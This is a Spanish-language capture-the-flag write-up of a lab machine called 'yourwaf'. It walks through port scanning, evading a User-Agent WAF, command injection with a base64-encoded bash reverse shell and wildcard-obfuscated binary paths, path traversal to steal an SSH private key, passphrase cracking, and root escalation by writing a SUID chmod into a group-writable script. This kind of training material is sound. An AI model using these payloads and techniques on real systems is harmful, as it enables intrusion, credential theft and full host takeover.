Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.44❯ nmap -sCV -p 22,80,3000 -oN 02-targeted.txt 192.168.1.44
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 18:43 -03
Nmap scan report for 192.168.1.44
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 1c:ec:5c:5b:fd:fc:ba:f3:4c:1b:0b:70:e6:ef:bf:12 (ECDSA)
|_ 256 26:18:c8:ec:34:aa:d5:b9:28:a1:e2:83:b0:d3:45:2e (ED25519)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.59 (Debian)
3000/tcp open http Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.72 secondsEl sitio redirige a un dominio que agregamos al /etc/hosts y enumeramos directorios:
❯ dirb 'http://www.yourwaf.nyx:3000' -o dirb_results -R
...
+ http://www.yourwaf.nyx:3000/logs (CODE:200|SIZE:52251982) + http://www.yourwaf.nyx:3000/readfile (CODE:200|SIZE:13)
...En /logs vemos que un WAF bloquea las peticiones según el User-Agent (detecta fuzzers como gobuster y ffuf). Lo evadimos cambiando el User-Agent y fuzzeamos subdominios, descubriendo maintenance:
❯ ffuf -u http://192.168.1.44 -H 'Host: FUZZ.yourwaf.nyx' -w ~/Documentos/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 100 -H 'User-Agent: pirula' -fs 0
...
www [Status: 200, Size: 10722, Words: 3594, Lines: 171, Duration: 21ms]
maintenance [Status: 200, Size: 292, Words: 58, Lines: 14, Duration: 2ms]
...maintenance.yourwaf.nyx tiene un input que ejecuta comandos, pero filtra ciertos caracteres. Lo evadimos codificando la reverse shell en base64 y usando comodines para los binarios:
❯ echo 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNy8xMjM0IDA+JjEK/???/e??o YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNy8xMjM0IDA+JjEK | base64 -d | /???/b??h -e
❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.44:42056.
bash: cannot set terminal process group (566): Inappropriate ioctl for device
bash: no job control in this shell
www-data@yourwaf:/var/www/maintenance.yourwaf.nyx$Para escalar privilegios, en /opt está la aplicación Node que expone el endpoint /readfile. Usamos su token para leer (vía path traversal) la clave id_rsa del usuario tester:
❯ curl 'http://www.yourwaf.nyx:3000/readfile?api-token=8c2b6a304191b8e2d81aaa5d1131d83d&file=../../../home/tester/.ssh/id_rsa' -o id_rsa_testerCrackeamos la passphrase con john y nos conectamos como tester, obteniendo la primera flag:
❯ ssh2john.py id_rsa_tester > hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
wafako (id_rsa_tester)
...
❯ ssh tester@192.168.1.44 -i id_rsa_tester
Enter passphrase for key 'id_rsa_tester': wafako
Linux yourwaf 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 26 22:47:28 2024 from 192.168.1.116
tester@yourwaf:~$Revisamos nuestros grupos y vemos que pertenecemos a copylogs:
tester@yourwaf:/opt/nodeapp$ id
uid=1000(tester) gid=1000(tester) grupos=1000(tester),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),1001(copylogs)En nodeapp hay un script propiedad de root pero escribible por el grupo copylogs. Le añadimos una línea que asigna el bit SUID a Bash (se ejecuta como root):
tester@yourwaf:/opt/nodeapp$ ls -la
...
-rwxrwxr-x 1 root copylogs 111 may 26 2024 copylogs.sh
...
tester@yourwaf:/opt/nodeapp$ echo 'chmod u+s /bin/bash' > copylogs.sh
tester@yourwaf:/opt/nodeapp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1265648 abr 23 2023 /bin/bash
tester@yourwaf:/opt/nodeapp$ bash -p
bash-5.2# whoami
rootObtenemos la flag y fin.